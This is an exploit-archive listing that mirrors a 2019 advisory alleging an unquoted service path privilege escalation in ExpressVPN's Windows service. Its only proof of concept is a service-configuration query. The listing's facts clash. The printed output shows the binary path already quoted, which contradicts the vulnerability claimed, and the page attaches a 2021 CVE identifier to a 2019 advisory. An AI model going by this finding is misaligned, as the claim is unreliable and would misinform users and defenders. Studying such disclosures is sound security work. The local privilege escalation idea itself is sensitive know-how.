Advertisement






ExpressVPN - Unquoted Service Path Privilege Escalation

CVE Category Price Severity
CVE-2021-36260 CWE-428 Not specified High
Author Risk Exploitation Type Date
unknown High Local 2019-07-15
CPE
cpe:cpe:/a:expressvpn:expressvpn
CVSS EPSS EPSSP
CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H 0.02576 0.66989

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019070065

Below is a copy:

ExpressVPN - Unquoted Service Path Privilege Escalation
********************************************************
 # Exploit Title : ExpressVPN - Unquoted Service Path Privilege Escalation
 # Vendor Homepage : www.expressvpn.com 
 # Exploit Author: Iran Cyber Security Group 
 # Date : 2019-07-14 
 # Tested on : Win10  
 # Discovered By : Und3rgr0und 
 # Our Team : www.iran-cyber.net 
 ******************************************************* 
 
 # Description :
 
An older access system gives users access to up levels access. ExpressVPN 
installs a service ("ExpressVPNService") with an unquoted service path running with SYSTEM privileges.
This allows any non-privileged local user to execute arbitrary code with SYSTEM privileges.
 
 # POC :
 
 C:\xpl\Und3rgr0und>sc qc ExpressVPNService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ExpressVPNService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files (x86)\ExpressVPN\bootstrap\amd64\nssm.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : ExpressVPN Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

 ******************************************************* 

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum